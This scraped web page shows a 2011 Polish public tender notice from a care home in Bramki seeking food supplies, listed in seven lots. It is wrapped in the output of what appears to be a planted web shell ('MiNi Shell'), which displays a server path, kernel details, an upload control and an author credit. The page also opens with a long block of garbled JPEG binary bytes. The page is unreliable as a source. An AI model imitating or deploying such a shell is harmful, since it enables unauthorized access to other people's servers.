JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/138038-N-2011.html

<p class="kh_header"><b>Błonie: Dostawa artykułów żywnościowych Dla Domu Pomocy Społecznej w Bramkach na II półrocze 2011 roku</b><br>
<b>Numer ogłoszenia: 138038 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Bramkach , ul. Północna 18, 05-870 Błonie, woj. mazowieckie, tel. 0-22 7256127, faks 0-22 7256066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsbramki.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych Dla Domu Pomocy Społecznej w Bramkach na II półrocze 2011 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1: ARTYKUŁY SPOŻYWCZE
Ananasy w puszcze 565 g - 30 szt; Aromaty 9 ml - 80 szt; Bakalie mieszanka 200 g - 20 szt; Barszcz biały 66 g - 110 szt; Bazylia suszona 10 g. - 50 szt; Brzoskwinie w puszcze 820 g. - 30 szt; Budyń czekoladowy 63 g. - 100 szt; Budyń śmietankowy 60 g. - 300 szt; Chrzan 320 g. - 100 szt; Cukier 1 kg. - 1500 szt; Cukier puder 0,4 kg - 20 szt; Cukier waniliowy 32 g. - 100 szt; Curry 20 g. - 30 szt; Cynamon 20 g. - 30 szt; Czosnek mielony 20 g. - 120 szt; Drożdże 100 g - 5 kg; Dżem niskosłodzony 280 g - 700 szt; Fasola sucha 500 g.- 120 kg; Fasola konserwowa 500 g - 100 szt; Fasola czerwona konserwowa 400 g - 100 szt; Galaretka owocowa z cukrem 79 g - 300 szt; Gałka muszkatołowa 20 g - 25 szt; Groszek konserwowy 400 g - 200 szt; Herbata granulowana 100 g - 50 kg; Kakao 100g -60 szt; Kasza gryczana 1 kg - 200 kg; Kasza jęczmienna 1 kg - 200 kg; Kasza manna 1 kg - 180 kg; Ketchup 500 g Tortex lub równoważny - 100 szt; Kisiel z cukrem 77 g - 300 szt; Koktajl owoców w syropie 850 g - 30 szt; Koncentrat pomidorowy 900 g - 100 szt; Konserwa rybna w oleju 170 g. - 200 szt; Konserwa rybna w pomidorach 170 g - 200 szt; Kukurydza konserwowa 400 g - 100 szt; Kwasek cytrynowy 50 g - 50 szt; Liście laurowe 6 g - 200 szt; Majeranek 10 g - 100 szt; Majonez 420 g - 200 szt; Mak 500 g - 10 kg; Makaron nitki 500 g - 80 kg; Makaron krajanka 5 kg - 300 kg; Makaron świderki 5 kg - 400 kg; Mąka Szymanowska 1 kg - 400 kg; Mieszanka owoców kandyzowanych 100 g - 30 szt; Miód 300 g - 10 szt; Musli 5 kg - 180 kg; Musztarda 200 g - 120 szt; Ocet 0,5 l - 15 szt; Ogórki konserwowe 900 g - 100 szt; Olej 1 l - 350 szt; Oregano 10 g - 50 szt; Papryka konserwowa 850 g - 100 szt; Papryka mielona 20 g - 50 szt; Pasztet z drobiu 155 g - 50 szt; Pieprz naturalny mielony 20 g - 400 szt; Płatki owsiane 1 kg - 180 kg; Płatki kukurydziane 5 kg - 180 kg; Płatki jęczmienne 5 kg - 180 kg; Proszek do pieczenia 36 g - 120 szt; Przyprawa do ryb 20 g - 50 szt; Przyprawa do drobiu 20 g - 50 szt; Przyprawa do kuchni włoskiej 20 g - 50 szt; Rodzynki 200 g - 50 szt; Ryż 1 kg - 250 kg; Sałatka szwedzka 850 g - 150 szt; Sałatka z cukinii 850 g - 150 szt; Sól 1 kg - 300 kg; Szczaw konserwowy 320 g - 150 szt; Śliwki suszone 100 g - 10 kg; Tymianek 10 g - 25 szt; Vegeta 200 g - 200 szt; Wiórki kokosowe 200 g - 20 szt; Ziele angielskie 12 g - 200 szt; Zupa grzybowa 37 g - 250 szt; Zupa ogonowa 62 g - 200 szt; Zupa pieczarkowa 44 g - 200 szt; Żelatyna 50 g - 60 szt; Soda oczyszczona 8 g - 30 szt.
ZADANIE 2:MIĘSO, WĘDLINA, DRÓB
Baleron odtłuszczony - 200 kg; Baleron wędzony - 100 kg; Boczek pieczony - 20 kg; Boczek prasowany - 80 kg; Boczek surowy b/k - 60 kg; Boczek wędzony - 30 kg; Golonka wieprzowa - 40 kg; Kaszanka - 150 kg; Kiełbasa biała - 40 kg; Kiełbasa cytrynowa - 150 kg; Kiełbasa dębicka - 150 kg; Kiełbasa krakowska - 100 kg; Kiełbasa parówkowa - 160 kg; Kiełbasa podwawelska - 150 kg; Kiełbasa szynkowa wieprzowa - 150 kg; Kiełbasa zwyczajna - 200 kg; Kiełbasa żywiecka - 100 kg; Korpusy z kurczaka - 150 kg; Kości wędzone - 100 kg; Kurczaki całe - 360 kg; Łopatka z kością - 600 kg; Łopatka pieczona - 80 kg; Mielona wieprzowa - 100 kg; Mięso mielone - 600 kg; Mięso wołowe b/k - 350 kg; Mięso wołowe z kością (antrykot) - 200 kg; Mortadela - 100 kg; Mortadela z warzywami - 80 kg; Polędwica z warzywami - 100 kg; Nogi wieprzowe - 120 kg; Ogonówka - 160 kg; Pałka z kurczaka - 170 kg; Parówki cienkie - 160 kg; Parówki drobiowe - 220 kg; Pasztet drobiowy pieczony - 150 kg; Pasztetowa kremowa - 100 kg; Pasztetowa drobiowa - 100 kg; Wątrobianka - 100 kg; Pieczeń wieprzowa - 100 kg; Piersi z indyka (filet) - 30 kg; Piersi z kurczaka (filet) - 250 kg; Polędwica sopocka - 20 kg; Salceson włoski - 100 kg; Schab karkowy z kością - 120 kg; Schab pieczony - 20 kg; Schab środkowy z kością - 300 kg; Słonina - 60 kg; Smalec - 60 kg; Szynka gotowana - 160 kg; Szynka wędzona - 160 kg; Szynka drobiowa - 150 kg; Baton drobiowy z kurczaka - 100 kg; Polędwica drobiowa - 150 kg; Szynka wieprzowa z kością - 80 kg; Udziec kurczaka - 170 kg; Wątroba wieprzowa - 170 kg; Żebra paski - 80 kg.
ZADANIE 3: RYBY
Panga biała filet mrożony b/s - 450 kg; Ryba wędzona - 120 kg; Śledź płaty - 150 kg.
ZADANIE 4: OWOCE I WARZYWA
Arbuzy - 100 kg; Banany - 200 kg; Botwina - 60 pęczków; Buraki czerwone - 900 kg; Brokuły - 200 szt; Cebula - 500 kg; Cytryny - 50 kg; Czosnek główki - 150 główek; Fasola szparagowa - 150 kg; Gruszki - 200 kg; Jabłka jonagold - 600 kg; Jabłka kompotowe - 500 kg; Kabaczek - 70 kg; Kalafiory - 300 szt; Kapusta biała - 200 kg; Kapusta czerwona - 150 kg; Kapusta kiszona - 500 kg; Kapusta młoda - 200 szt; Kapusta pekińska - 240 kg; Koper - 200 pęczków; Mandarynki - 100 kg; Marchew - 1100 kg; Natka - 360 pęczków; Ogórki gruntowe - 200 kg; Ogórki kiszone - 600 kg; Ogórki świeże spod osłon długie - 100 kg; Papryka świeża  - 200 kg; Pieczarki - 300 kg; Pietruszka - 350 kg; Pomarańcza - 200 kg; Pomidory - 900 kg; Por - 230 kg; Rabarbar - 70 kg; Rzodkiewka - 300 pęczków; Sałata masłowa - 400 szt; Sałata lodowa - 50 szt; Seler - 200 kg; Szczypior - 400 pęczków; Truskawki świeże - 250 kg; Śliwki - 300 kg, Wiśnie - 250 kg; Ziemniaki - 8000 kg; Ziemniaki młode - 3000 kg.
ZADANIE 5: NABIAŁ
Jogurt naturalny w kubku 150 g - 1100 szt; Masło roślinne w kostce 250 g - 4400 szt; Mleko 2% w folii 1 l - 2700 l; Mleko 2% w kartonie 1 l - 2600 szt; Ser biały półtłusty - 380 kg; Ser biały chudy - 50 kg; Ser topiony 100 g - 1200 szt; Ser żółty edamski - 70 kg; Ser żółty gouda - 70 kg; Śmietana 30 % 1 l - 150 l; Śmietana 18 % 500 ml - 100 l; 
ZADANIE 6: PIECZYWO
Bułki paryskie - 9000 szt; Bułki kajzerki - 250 szt; Bułki słodkie - 100 szt; Bułki maślane 350 szt; Chleb pszenno -żytni  - 7000 szt; Chleb razowy - 1800 szt.
ZADANIE 7: JAJA
Jaja 65-70 g - 19000 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Możliwe jest zwiększenie zamówienia na wyżej wymienione artykuły</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych, tj dotyczące:
posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
posiadania wiedzy i doświadczenia;
sytuacji ekonomicznej i finansowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 ust. 1 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych, należy przedłożyć:
oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 według wzoru określonego w załączniku nr 2 do SWIZ;
wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia dostaw (w przypadku świadczeń okresowych lub ciągłych również wykonywanych), a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym podmiot zamówienia - załącznik nr 4 do SWIZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym 	przez  Zamawiającego, Wykonawcy zobowiązani są załączyć do oferty dokument 	potwierdzający stosowanie wdrożonego systemu HACCP albo oświadczenie 	Wykonawcy potwierdzające stosowanie zasad dobrej praktyki higienicznej (GHP).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potwierdzenia niepodlegania wykluczeniu przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych, należy przedłożyć:
Oświadczenie o braku podstaw do wykluczenia - według wzoru określonego w załączniku nr 3 do SWIZ;
Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustaw Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsbramki.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Bramkach, ul. Północna 18
05-870 Błonie pokój nr 17..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej w Bramkach, ul. Północna 18
05-870 Błonie pokój nr 17..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com